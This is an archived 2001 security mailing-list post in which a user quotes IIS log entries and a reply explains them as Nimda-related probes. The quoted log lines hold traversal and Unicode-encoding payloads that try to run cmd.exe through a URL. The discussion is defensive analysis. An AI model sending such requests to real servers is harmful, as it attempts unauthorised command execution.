OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Scott Gifford (sgiffordsuspectclass.com)
Date: Mon Oct 08 2001 - 21:27:42 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    "Rob 'Feztaa' Park" <fezzikerhome.com> writes:

    > Is this some kind of new worm, or is this part of Nimda?
    >
    > ...
    > 24.79.126.53 - - [04/Oct/2001:22:04:45 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:48 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:50 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:53 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > ...
    >
    > I think that's pretty messed up that all 10 of those happened within 7
    > seconds of each other... My logs are full of this crud.
    >
    > Thanks in advance :)

    Nimda opens up the hole that this is trying to exploit. You can see
    it trying to run cmd.exe as a CGI script, passing it the parameters
    "/c dir". That would (not surprisingly) run the "dir" command through
    NT's command interpreter, "cmd.exe". It's trying all sorts of
    locations and making some half-hearted attempts to trick IIS into
    running it even if it's not Nimda infected, by using international
    encodings and such.

    Looks like a scan; probably a shell script somebody threw together.
    I'm not looking forward to finding out what they plan on doing with
    their piles of zombie IIS servers...

    ----ScottG.